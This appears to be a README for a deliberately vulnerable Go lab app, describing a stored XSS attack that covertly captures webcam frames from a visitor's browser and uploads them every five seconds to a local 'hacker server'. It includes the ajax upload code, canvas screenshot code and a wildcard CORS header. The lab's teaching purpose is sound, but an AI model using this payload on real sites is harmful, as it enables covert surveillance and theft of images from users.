# Future Work
1. Implement delete function for database
2. Research Web RTC to stream the video to the hacker server
3. Learn and modify other Vulnerabilities.

# Implementation Steps:

## Database Setup
1. Install mysql in the local machine.
2. Access the mysql in the terminal.
3. Run /gonv/scripts/db_create.sql.
4. Check if the database called gonv exists or not.
5. Go to /gonv/data/data.go and modify the password

## Run the Stored Xss Vulnerable App
1. Go to /gonv/modules/xss/stored
2. Run ```go run main.go``` and open ```localhost:8000/comments``` in the browser.
3. Add some dummy data in the comments.

## Run Hacker Server
1. Go to /gonv/modules/xss/hacker_server and run ```go run main.go```.
2. Open ```localhost:8004``` in the browser.

## Start Hacking
1. Copy /gonv/modules/xss/example/index.html and paste into the comment field
   in the vulnerable app and hit the submit button.
2. Open the network tab and see if there is upload request showing every 5 seconds.
3. Go back ```localhost:8004``` and refresh the browser to see the screenshots.

## What I Learnt Through This Work
1. How to bypass CORS error in the console log?
    - Add ```w.Header().Set("Access-Control-Allow-Origin", "*")``` in the destination 
      server.
2. How to send image with ajax using multipart format?
    - Below code will do the magic for you. 
```
     // Send to the hacker server using ajax
     let data = new FormData();
     data.append("file", file);
     $.ajax({
         url: 'http://localhost:8004/upload',
         type: 'post',
         data: data,
         crossDomain: true,
         cache: false,
         processData: false,
         contentType: false,
     });
 ```
 
3. Why is there a black screenshot?
    - Because you have to add ```autoplay``` in the ```<video id="v" style="display:none;" autoplay>Not supported in your browser</video>```.
    If you don't add it, you will get the black screenshot.
4. How to take screenshots?
    - Below code will do the magic
```
   // Capture the video and save into a file
   canvas.getContext("2d").drawImage(video, 0, 0, 1000, 1000, 0, 0, 1000, 1000);
   let image = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
   // window.location.href = image;
   let blobBin = atob(image.split(',')[1]);
   let array = [];
   for(let i = 0; i < blobBin.length; i++) {
       array.push(blobBin.charCodeAt(i));
   }
   let file = new Blob([new Uint8Array(array)], {type: 'image/png'});
```
